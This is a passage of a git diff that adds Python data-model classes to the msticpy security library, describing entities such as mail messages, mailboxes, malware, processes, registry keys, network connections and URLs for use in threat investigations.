+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event:
+            self._create_from_event(src_event)
+
+    def _create_from_event(self, src_event):
+        self.Recipient = src_event.get("Recipient")
+        self.Files = src_event.get("FileEntityIds")
+        self.Urls = src_event.get("Urls")
+        self.Threats = src_event.get("Threats")
+        self.SenderIP = src_event.get("SenderIP")
+        self.P1Sender = src_event.get("P1Sender")
+        self.P1SenderDisplayName = src_event.get("P1SenderDisplayName")
+        self.P1SenderDomain = src_event.get("P1SenderDomain")
+        self.P2Sender = src_event.get("P2Sender")
+        self.P2SenderDisplayName = src_event.get("P2SenderDisplayName")
+        self.P2SenderDomain = src_event.get("P2SenderDomain")
+        self.ReceivedDate = src_event.get("ReceiveDate")
+        self.NetworkMessageId = src_event.get("NetworkMessageId")
+        self.InternetMessageId = src_event.get("InternetMessageId")
+        self.Subject = src_event.get("Subject")
+        self.AntispamDirection = src_event.get("AntispamDirection")
+        self.DeliveryAction = src_event.get("DeliveryAction")
+        self.Language = src_event.get("Language")
+
+    @property
+    def description_str(self):
+        """Return Entity Description."""
+        return self.NetworkMessageId or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return (
+            self.Subject
+            or f"MailMessage to: {self.Recipient}"
+            or self.__class__.__name__
+        )
+
+    _entity_schema = {
+        "Recipient": None,
+        "Files": (list, "File"),
+        "Urls": None,
+        "Threats": None,
+        "Sender": None,
+        "P1Sender": None,
+        "P1SenderDisplayName": None,
+        "P1SenderDomain": None,
+        "SenderIP": None,
+        "P2Sender": None,
+        "P2SenderDisplayName": None,
+        "P2SenderDomain": None,
+        "ReceivedDate": None,
+        "NetworkMessageId": None,
+        "InternetMessageId": None,
+        "Subject": None,
+        "BodyFingerprintBin1": None,
+        "BodyFingerprintBin2": None,
+        "BodyFingerprintBin3": None,
+        "BodyFingerprintBin4": None,
+        "BodyFingerprintBin5": None,
+        "AntispamDirection": None,
+        "DeliveryAction": None,
+        "DeliveryLocation": None,
+        "Language": None,
+        "ThreatDetectionMethods": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/mailbox.py b/msticpy/datamodel/entities/mailbox.py
new file mode 100644
index 000000000..a12b0fc06
--- /dev/null
+++ b/msticpy/datamodel/entities/mailbox.py
@@ -0,0 +1,105 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Mailbox Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class Mailbox(Entity):
+    """
+    Mailbox Entity class.
+
+    Attributes
+    ----------
+    MailboxPrimaryAddress : str
+        PrimaryAddress of the Mailbox
+    DisplayName : str
+        DisplayName of the Mailbox
+    Upn : str
+        Upn of the Mailbox
+    ExternalDirectoryObjectId : str
+        ExternalDirectoryObjectId of the Mailbox
+    RiskLevel : str
+        RiskLevel of the Mailbox
+
+    """
+
+    ID_PROPERTIES = ["MailboxPrimaryAddress"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.MailboxPrimaryAddress: Optional[str] = None
+        self.DisplayName: Optional[str] = None
+        self.Upn: Optional[str] = None
+        self.ExternalDirectoryObjectId: Optional[str] = None
+        self.RiskLevel: Optional[str] = None
+
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event:
+            self._create_from_event(src_event)
+
+    def _create_from_event(self, src_event):
+        self.MailboxPrimaryAddress = src_event.get("MailboxPrimaryAddress")
+        self.Upn = src_event.get("Upn")
+        self.DisplayName = src_event.get("DisplayName")
+
+    @property
+    def description_str(self):
+        """Return Entity Description."""
+        return (
+            f"{self.MailboxPrimaryAddress} - {self.RiskLevel}"
+            or self.__class__.__name__
+        )
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.MailboxPrimaryAddress or self.__class__.__name__
+
+    _entity_schema = {
+        "MailboxPrimaryAddress": None,
+        "DisplayName": None,
+        "Upn": None,
+        "ExternalDirectoryObjectId": None,
+        "RiskLevel": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/malware.py b/msticpy/datamodel/entities/malware.py
new file mode 100644
index 000000000..1defe7750
--- /dev/null
+++ b/msticpy/datamodel/entities/malware.py
@@ -0,0 +1,91 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Malware Entity class."""
+from typing import Any, List, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .file import File
+from .process import Process
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class Malware(Entity):
+    """
+    Malware Entity class.
+
+    Attributes
+    ----------
+    Name : str
+        Malware Name
+    Category : str
+        Malware Category
+    File : File
+        Malware File
+    Files : List[File]
+        Malware Files
+    Processes : List[Process]
+        Malware Processes
+
+    """
+
+    ID_PROPERTIES = ["Name"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Name: str = ""
+        self.Category: str = ""
+        self.File: Optional[File] = None
+        self.Files: List[File] = []
+        self.Processes: List[Process] = []
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.Name}: {self.Category}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.Name or self.__class__.__name__
+
+    _entity_schema = {
+        # Name (type System.String)
+        "Name": None,
+        # Category (type System.String)
+        "Category": None,
+        # File (type Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.File)
+        "File": "File",
+        "Files": (list, "File"),
+        "Processes": (list, "Process"),
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/network_connection.py b/msticpy/datamodel/entities/network_connection.py
new file mode 100644
index 000000000..723160f5c
--- /dev/null
+++ b/msticpy/datamodel/entities/network_connection.py
@@ -0,0 +1,103 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""NetworkConnection Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .ip_address import IpAddress
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class NetworkConnection(Entity):
+    """
+    NetworkConnection Entity class.
+
+    Attributes
+    ----------
+    SourceAddress : IPAddress
+        NetworkConnection SourceAddress
+    SourcePort : int
+        NetworkConnection SourcePort
+    DestinationAddress : IPAddress
+        NetworkConnection DestinationAddress
+    DestinationPort : int
+        NetworkConnection DestinationPort
+    Protocol : str
+        NetworkConnection Protocol
+
+
+    """
+
+    ID_PROPERTIES = [
+        "SourceAddress",
+        "SourcePort",
+        "DestinationAddress",
+        "DestinationPort",
+    ]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.SourceAddress: Optional[IpAddress] = None
+        self.SourcePort: Optional[int] = None
+        self.DestinationAddress: Optional[IpAddress] = None
+        self.DestinationPort: Optional[int] = None
+        self.Protocol: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return (
+            f"{self.SourceAddress}:{self.SourcePort} [{self.Protocol}]-> "
+            "{self.DestinationAddress}:{self.DestinationPort}"
+        )
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.__class__.__name__
+
+    _entity_schema = {
+        # SourceAddress (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.IP)
+        "SourceAddress": "IpAddress",
+        # SourcePort (type System.Nullable`1[System.Int32])
+        "SourcePort": None,
+        # DestinationAddress (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.IP)
+        "DestinationAddress": "IpAddress",
+        # DestinationPort (type System.Nullable`1[System.Int32])
+        "DestinationPort": None,
+        # Protocol (type System.Nullable`1[System.Net.Sockets.ProtocolType])
+        "Protocol": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/process.py b/msticpy/datamodel/entities/process.py
new file mode 100644
index 000000000..be9b41384
--- /dev/null
+++ b/msticpy/datamodel/entities/process.py
@@ -0,0 +1,188 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Process Entity class."""
+from datetime import datetime
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .account import Account
+from .entity_enums import ElevationToken
+from .file import File
+from .host import Host
+from .host_logon_session import HostLogonSession
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name, too-many-instance-attributes
+
+
+@export
+class Process(Entity):
+    """
+    Process Entity class.
+
+    Attributes
+    ----------
+    ProcessId : str
+        Process ProcessId
+    CommandLine : str
+        Process CommandLine
+    ElevationToken : str
+        Process ElevationToken
+    CreationTimeUtc : datetime
+        Process CreationTimeUtc
+    ImageFile : File
+        Process ImageFile
+    Account : Account
+        Process Account
+    ParentProcess : Process
+        Process ParentProcess
+    Host : Host
+        Process Host
+    LogonSession : HostLogonSession
+        Process LogonSession
+
+    """
+
+    ID_PROPERTIES = ["ProcessId", "ImageFile", "CreationTimeUtc", "CommandLine"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        role="new",
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+        role : str, optional
+            'new' or 'parent' - only relevant if the entity
+            is being constructed from an event.
+            (the default is 'new')
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.ProcessId: Optional[str] = None
+        self.CommandLine: Optional[str] = None
+        self.ElevationToken: Optional[ElevationToken] = None
+        self.CreationTimeUtc: datetime = datetime.min
+        self.ImageFile: Optional[File] = None
+        self.Account: Optional[Account] = None
+        self.ParentProcess: Optional[Process] = None
+        self.Host: Optional[Host] = None
+        self.LogonSession: Optional[HostLogonSession] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+        # pylint: disable=locally-disabled, line-too-long
+        if src_event is not None:
+            self._create_from_event(src_event, role)
+
+    def _create_from_event(self, src_event, role):
+        if role == "new":
+            self.ProcessId = src_event.get("NewProcessId")
+            self.CommandLine = src_event.get("CommandLine")
+            if "TimeCreatedUtc" in src_event:
+                self.CreationTimeUtc = src_event["TimeCreatedUtc"]
+            elif "TimeGenerated" in src_event:
+                self.CreationTimeUtc = src_event["TimeGenerated"]
+            self.ImageFile = File(src_event=src_event, role="new")
+            self.Account = Account(src_event=src_event, role="subject")
+
+            if "ParentProcessName" in src_event or "ProcessName" in src_event:
+                parent = Process(src_event=src_event, role="parent")
+                self.ParentProcess = parent
+
+            # Linux properties
+            self.success = src_event.get("success")
+            self.audit_user = src_event.get("audit_user")
+            self.auid = src_event.get("auid")
+            self.group = src_event.get("group")
+            self.gid = src_event.get("gid")
+            self.effective_user = src_event.get("effective_user")
+            self.euid = src_event.get("euid")
+            self.effective_group = src_event.get("effective_group")
+            self.egid = src_event.get("effective_group")
+            self.cwd = src_event.get("cwd")
+            self.name = src_event.get("cwd")
+        else:
+            self.ProcessId = src_event.get("ProcessId")
+            self.ImageFile = File(src_event=src_event, role="parent")
+
+    @property
+    def ProcessName(self) -> Optional[str]:  # noqa: N802
+        """Return the name of the process file."""
+        file = self["ImageFile"]
+        return file.Name if file else None
+
+    @property
+    def ProcessFilePath(self) -> Optional[str]:  # noqa: N802
+        """Return the name of the process file path."""
+        file = self.ImageFile
+        return file.FullPath if file else None
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        if self.ProcessFilePath:
+            return f"{self.ProcessFilePath}: {self.CommandLine}"
+        return self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        if self.ImageFile:
+            return f"{self.ImageFile.name_str}[pid:{self.ProcessId}]"
+        return self.ImageFile.name_str if self.ImageFile else super().name_str
+
+    _entity_schema = {
+        # ProcessId (type System.String)
+        "ProcessId": None,
+        # CommandLine (type System.String)
+        "CommandLine": None,
+        # ElevationToken (type System.Nullable`1
+        # [Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.ElevationToken])
+        "ElevationToken": None,
+        # CreationTimeUtc (type System.Nullable`1[System.DateTime])
+        "CreationTimeUtc": None,
+        # ImageFile (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.File)
+        "ImageFile": "File",
+        # Account (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.Account)
+        "Account": "Account",
+        # ParentProcess (type Microsoft.Azure.Security.Detection.AlertContracts
+        # .V3.Entities.Process)
+        "ParentProcess": "Process",
+        # Host (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.Host)
+        "Host": "Host",
+        # Host (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.HostLogonSession)
+        "LogonSession": "HostLogonSession",
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/registry_key.py b/msticpy/datamodel/entities/registry_key.py
new file mode 100644
index 000000000..35abe1397
--- /dev/null
+++ b/msticpy/datamodel/entities/registry_key.py
@@ -0,0 +1,80 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""RegistryValue Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .entity_enums import RegistryHive
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class RegistryKey(Entity):
+    """
+    RegistryKey Entity class.
+
+    Attributes
+    ----------
+    Hive : RegistryHive
+        RegistryKey Hive
+    Key : str
+        RegistryKey Key
+
+    """
+
+    ID_PROPERTIES = ["Hive", "Key"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Hive: Optional[RegistryHive] = None
+        self.Key: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.Hive.short_name if self.Hive else 'HiveNA'}\\{self.Key}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        hive = self.Hive.short_name if self.Hive else ""
+        r_key = self.Key.rsplit("\\", maxsplit=1)[-1] if self.Key else "RegKeyNA"
+        return f"{hive}\\..\\{r_key}"
+
+    _entity_schema = {
+        # Hive (type System.Nullable`1
+        # [Microsoft.Azure.Security.Detection.AlertContracts.V3.Entities.RegistryHive])
+        "Hive": "RegistryHive",
+        # Key (type System.String)
+        "Key": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/registry_value.py b/msticpy/datamodel/entities/registry_value.py
new file mode 100644
index 000000000..1eb7f3648
--- /dev/null
+++ b/msticpy/datamodel/entities/registry_value.py
@@ -0,0 +1,91 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""RegistryValue Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+from .registry_key import RegistryKey
+
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class RegistryValue(Entity):
+    """
+    RegistryValue Entity class.
+
+    Attributes
+    ----------
+    Key : str
+        RegistryValue Key
+    Name : str
+        RegistryValue Name
+    Value : str
+        RegistryValue Value
+    ValueType : str
+        RegistryValue ValueType
+
+    """
+
+    ID_PROPERTIES = ["Key", "Name", "Value"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Key: Optional[RegistryKey] = None
+        self.Name: Optional[str] = None
+        self.Value: Optional[str] = None
+        self.ValueType: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        key = self.Key.description_str if self.Key else "Unknown key"
+        return f"{key}:{self.Name}[{self.ValueType}]:{repr(self.Value)}"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        key = self.Key.name_str if self.Key else "RegPathNA"
+        return f"{key}:{(self.Name or 'NameNA')} (RegVal)"
+
+    _entity_schema = {
+        # Key (type Microsoft.Azure.Security.Detection
+        # .AlertContracts.V3.Entities.RegistryKey)
+        "Key": "RegistryKey",
+        # Name (type System.String)
+        "Name": None,
+        # Value (type System.String)
+        "Value": None,
+        # ValueType (type System.Nullable`1[Microsoft.Win32.RegistryValueKind])
+        "ValueType": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/security_group.py b/msticpy/datamodel/entities/security_group.py
new file mode 100644
index 000000000..bd6e85736
--- /dev/null
+++ b/msticpy/datamodel/entities/security_group.py
@@ -0,0 +1,81 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""SecurityGroup Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class SecurityGroup(Entity):
+    """
+    SecurityGroup Entity class.
+
+    Attributes
+    ----------
+    DistinguishedName : str
+        SecurityGroup DistinguishedName
+    SID : str
+        SecurityGroup SID
+    ObjectGuid : str
+        SecurityGroup ObjectGuid
+
+    """
+
+    ID_PROPERTIES = ["DistinguishedName", "SID", "ObjectGuid"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.DistinguishedName: Optional[str] = None
+        self.SID: Optional[str] = None
+        self.ObjectGuid: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self):
+        """Return Entity Description."""
+        return self.DistinguishedName or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.__class__.__name__
+
+    _entity_schema = {
+        # DistinguishedName (type System.String)
+        "DistinguishedName": None,
+        # SID (type System.String)
+        "SID": None,
+        # ObjectGuid (type System.String)
+        "ObjectGuid": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/submission_mail.py b/msticpy/datamodel/entities/submission_mail.py
new file mode 100644
index 000000000..dee0739be
--- /dev/null
+++ b/msticpy/datamodel/entities/submission_mail.py
@@ -0,0 +1,107 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Submission mail Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class SubmissionMail(Entity):
+    """
+    SubmissionMail Entity class.
+
+    Attributes
+    ----------
+    SubmissionId : str
+        SubmissionId of the submission mail
+    SubmissionDate : datetime
+        SubmissionDate of the submission mail
+    Submitter : str
+        Submitter email of the submission mail
+    NetworkMessageId : str
+        NetworkMessageId of the submission mail
+    Timestamp : datetime
+        The Time stamp when the message is received
+    Recipient : str
+        Recipient of the submission mail
+    Sender : str
+        Sender of the submission mail
+    SenderIp : str
+        SenderIp of the submission mail
+    Subject : str
+        Subject of the submission mail
+    ReportType : str
+        ReportType of the submission mail
+
+    """
+
+    ID_PROPERTIES = ["NetworkMessageId", "Recipient"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.SubmissionId: Optional[str] = None
+        self.SubmissionDate: Any = None
+        self.Submitter: Optional[str] = None
+        self.NetworkMessageId: Optional[str] = None
+        self.Timestamp: Any = None
+        self.Recipient: Optional[str] = None
+        self.Sender: Optional[str] = None
+        self.SenderIp: Optional[str] = None
+        self.Subject: Optional[str] = None
+        self.ReportType: Optional[str] = None
+
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self):
+        """Return Entity Description."""
+        return self.SubmissionId or self.__class__.__name__
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.__class__.__name__
+
+    _entity_schema = {
+        "SubmissionId": None,
+        "SubmissionDate": None,
+        "Submitter": None,
+        "NetworkMessageId": None,
+        "Timestamp": None,
+        "Recipient": None,
+        "Sender": None,
+        "SenderIp": None,
+        "Subject": None,
+        "ReportType": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/threat_intelligence.py b/msticpy/datamodel/entities/threat_intelligence.py
new file mode 100644
index 000000000..95dc03314
--- /dev/null
+++ b/msticpy/datamodel/entities/threat_intelligence.py
@@ -0,0 +1,81 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Threatintelligence Entity class."""
+from typing import Any, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class Threatintelligence(Entity):
+    """
+    Threatintelligence Entity class.
+
+    Attributes
+    ----------
+    ProviderName : str
+        Threatintelligence ProviderName
+    ThreatType : str
+        Threatintelligence ThreatType
+    ThreatName : str
+        Threatintelligence ThreatName
+    Confidence : str
+        Threatintelligence Confidence
+    ReportLink : str
+        Threatintelligence ReportLink
+    ThreatDescription : str
+        Threatintelligence ThreatDescription
+
+    """
+
+    ID_PROPERTIES = ["ProviderName", "ThreatName", "ReportLink"]
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+            :param src_entity: instantiate entity using properties of src entity
+            :param kwargs: key-value pair representation of entity
+        """
+        self.ProviderName: Optional[str] = None
+        self.ThreatType: Optional[str] = None
+        self.ThreatName: Optional[str] = None
+        self.Confidence: Optional[str] = None
+        self.ReportLink: Optional[str] = None
+        self.ThreatDescription: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return f"{self.ThreatName} ({self.ThreatType})"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.ThreatName or self.__class__.__name__
+
+    _entity_schema = {
+        # String Name of the provider from whom this
+        # Threat Intelligence information was received
+        "ProviderName": None,
+        "ThreatType": None,
+        "ThreatName": None,
+        "Confidence": None,
+        "ReportLink": None,
+        "ThreatDescription": None,
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/unknown_entity.py b/msticpy/datamodel/entities/unknown_entity.py
new file mode 100644
index 000000000..29cc12d02
--- /dev/null
+++ b/msticpy/datamodel/entities/unknown_entity.py
@@ -0,0 +1,49 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Threatintelligence Entity class."""
+from typing import Any, Dict, Mapping
+
+from ..._version import VERSION
+from ...common.utility import export
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class UnknownEntity(Entity):
+    """Generic Entity class."""
+
+    def __init__(self, src_entity: Mapping[str, Any] = None, **kwargs):
+        """
+        Create a new instance of the entity type.
+
+            :param src_entity: instantiate entity using properties of src entity
+            :param kwargs: key-value pair representation of entity
+        """
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_entity:
+            self.__dict__.update(src_entity)
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return "OtherEntity"
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.__class__.__name__
+
+    _entity_schema: Dict[str, Any] = {
+        "TimeGenerated": None,
+        "StartTime": None,
+        "EndTime": None,
+    }
diff --git a/msticpy/datamodel/entities/url.py b/msticpy/datamodel/entities/url.py
new file mode 100644
index 000000000..a9f9802e0
--- /dev/null
+++ b/msticpy/datamodel/entities/url.py
@@ -0,0 +1,107 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Url Entity class."""
+from typing import Any, Dict, Mapping, Optional
+
+from ..._version import VERSION
+from ...common.utility import export
+from ...sectools.domain_utils import url_components
+from .entity import Entity
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+
+
+@export
+class Url(Entity):
+    """
+    URL Entity.
+
+    Attributes
+    ----------
+    Url : str
+        The URL
+    DetonationVerdict : str
+        The verdict of the URL detection
+
+    """
+
+    ID_PROPERTIES = ["Url"]
+
+    def __init__(
+        self,
+        src_entity: Mapping[str, Any] = None,
+        src_event: Mapping[str, Any] = None,
+        **kwargs,
+    ):
+        """
+        Create a new instance of the entity type.
+
+        Parameters
+        ----------
+        src_entity : Mapping[str, Any], optional
+            Create entity from existing entity or
+            other mapping object that implements entity properties.
+            (the default is None)
+        src_event : Mapping[str, Any], optional
+            Create entity from event properties
+            (the default is None)
+
+        Other Parameters
+        ----------------
+        kwargs : Dict[str, Any]
+            Supply the entity properties as a set of
+            kw arguments.
+
+        """
+        self.Url: Optional[str] = None
+        self.DetonationVerdict: Optional[str] = None
+        super().__init__(src_entity=src_entity, **kwargs)
+        if src_event:
+            self._create_from_event(src_event)
+
+    def _create_from_event(self, src_event):
+        self.Url = src_event["Url"]
+        if "AdditionalData" in src_event:
+            self.DetonationVerdict = src_event["AdditionalData"]["DetonationVerdict"]
+
+    @property
+    def description_str(self) -> str:
+        """Return Entity Description."""
+        return self.Url or super().description_str
+
+    @property
+    def name_str(self) -> str:
+        """Return Entity Name."""
+        return self.Url or self.__class__.__name__
+
